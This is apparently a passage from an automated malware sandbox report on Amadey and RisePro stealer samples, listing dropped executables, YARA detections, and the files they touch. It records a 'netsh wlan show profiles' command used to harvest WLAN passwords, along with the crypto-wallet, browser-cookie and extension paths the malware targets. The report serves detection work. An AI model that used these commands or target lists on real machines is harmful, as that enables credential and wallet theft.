Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C5E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00C5E27A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AD6160 LookupAccountNameA, 6_2_00AD6160
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 11.2.rundll32.exe.6e360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.rundll32.exe.6c8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 11.2.rundll32.exe.6e360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.rundll32.exe.6c8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.chrosha.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.amert.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorha.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UeW2b6mU6Z.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorha.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1662528461.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1631465413.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2896697223.0000000000721000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2419534146.0000000000D01000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2904688254.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2906723727.000000006E361000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2378317595.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2305523548.0000000004730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2906782204.000000006C8B1000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1711152742.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1670942847.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2430115976.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1671668895.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1703275180.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2619416783.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2927751545.0000000008107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.2871931818.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2897094573.00000000002E1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2553727448.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2702706239.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2895798421.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000002.2895930049.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\aMLtP386CmzygUXw7MGrDsU.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4JKZLoG_AJreMfNRzAg0gnZ.zip, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet~
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet~
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets$
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: 590971cd60.exe, 00000014.00000002.2894697417.0000000007F00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
